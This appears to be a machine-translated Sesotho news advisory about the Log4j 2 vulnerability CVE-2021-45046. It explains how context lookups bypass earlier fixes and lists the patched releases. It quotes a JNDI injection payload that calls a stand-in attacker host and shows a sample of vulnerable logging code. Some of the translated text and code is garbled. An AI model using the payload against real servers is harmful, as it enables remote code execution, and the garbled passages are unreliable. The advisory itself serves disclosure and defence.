Kotsi e 'ngoe e khethiloe ts'ebetsong ea li-loko tsa JNDI ho laebrari ea Log4j 2 (CVE-2021-45046), e hlahang ho sa tsotellehe litokiso tse kentsoeng tokollong ea 2.15 le ho sa tsotellehe tšebeliso ea "log4j2.noFormatMsgLookup" bakeng sa ts'ireletso. Bothata bo kotsi haholo bakeng sa mefuta ea khale ea Log4j 2, e sirelelitsoeng ka ho sebelisa folakha ea "noFormatMsgLookup", kaha e etsa hore ho khonehe ho qoba ts'ireletso ho tsoa bofokoling ba nakong e fetileng (Log4Shell, CVE-2021-44228), e u lumellang hore u phethe khoutu ea hau ho seva. Bakeng sa basebelisi ba mofuta oa 2.15, tšebeliso e mpe e lekanyelitsoe ho etsa hore sesebelisoa se senyehe ka lebaka la mokhathala oa lisebelisoa tse teng.
Kotsi e hlaha feela ho sistimi e sebelisang Context Lookups bakeng sa ho rekota, joalo ka ${ctx:loginId}, kapa litempele tsa MDC (Thread Context Map), joalo ka %X, %mdc, le %MDC. Ts'ebetso e theohela ho theha maemo a ho hlahisa data e nang le li-substitutes tsa JNDI ho log ha u sebelisa lipotso tsa moelelo kapa litempele tsa MDC ts'ebelisong e hlalosang melao ea ho fomata tlhahiso ho log.
Bafuputsi ba LunaSec ba hlokometse hore bakeng sa liphetolelo tsa Log4j tse ka tlase ho 2.15, ts'oaetso ena e ka sebelisoa e le vector e ncha bakeng sa tlhaselo ea Log4Shell, e lebisang ho ts'ebetsong ea khoutu, haeba lipolelo tsa ThreadContext tse kenyelletsang data ea ka ntle li sebelisoa tlhahisong ea log, ho sa tsotellehe hore na folaga ea "sireletsa" e lumelletsoe. noMsgFormatLookups" kapa thempleite "%m{nolookups}".
Ho iphapanyetsa tšireletso ho tla tabeng ea hore ho e-na le ho fetola ka ho toba "${jndi:ldap://attacker.com/a}", polelo ena e nkeloa sebaka ke boleng ba phapang e bohareng e sebelisoang melaong ea ho fometa tlhahiso ea log. . Ka mohlala, haeba potso ea moelelo oa taba ${ctx:apiversion} e sebelisoa ha u hlahisa logi, tlhaselo e ka etsoa ka ho kenya "${jndi:ldap://attacker.com/a}" sebakeng sa "${jndi:ldap://attacker.com/a}". boleng bo ngotsweng ho phapano ya apiversion. Mohlala oa khoutu e tlokotsing: appender.console.layout.pattern = ${ctx:apiversion} - %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n @ GetMapping("/") public String index(@RequestHeader("X-Api-Version") String apiVersion) {// Boleng ba sehlooho sa "X-Api-Version" HTTP bo fetisetsoa ho ThreadContext ThreadContext.put("apiversion) ", apiVersion ); // Ha o hlahisa logong, boleng ba kantle ba apiversion bo tla sebetsoa ho sebelisoa sebaka sa ${ctx:apiversion} logger.info("E amohetse kopo ea mofuta oa API"); khutla "Lumela, lefatše!"; }
Ho Log4j mofuta oa 2.15, ho ba kotsing ho ka sebelisoa ho etsa litlhaselo tsa DoS ha ho fetisetsoa boleng ho ThreadContext, ho bakang loop ts'ebetsong ea template ea ho fometa.
Ho thibela ho ba kotsing, lintlafatso tsa 2.16 le 2.12.2 li phatlalalitsoe. Lekaleng la Log4j 2.16, ho phaella ho litokiso tse kentsoeng phetolelong ea 2.15 le ho tlamaha ha likopo tsa JNDI LDAP ho "localhost", ts'ebetso ea JNDI e holofalitsoe ka ho feletseng ka ho feletseng 'me tšehetso ea li-templates tsa ho fetola melaetsa e tlosoa. E le mokhoa oa ts'ireletso, ho khothaletsoa ho tlosa sehlopha sa JndiLookup tseleng ea sehlopha (mohlala, "zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class") .
U ka lekola ponahalo ea lipakete ka har'a liphutheloana maqepheng a likhatiso (Debian, Ubuntu, RHEL, SUSE, Fedora, Arch) le baetsi ba sethala sa Java (GitHub, Docker, Oracle, vmWare, Broadcom le Amazon / AWS, Juniper, VMware, Cisco, IBM , Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure, joalo-joalo).
Source: opennet.ru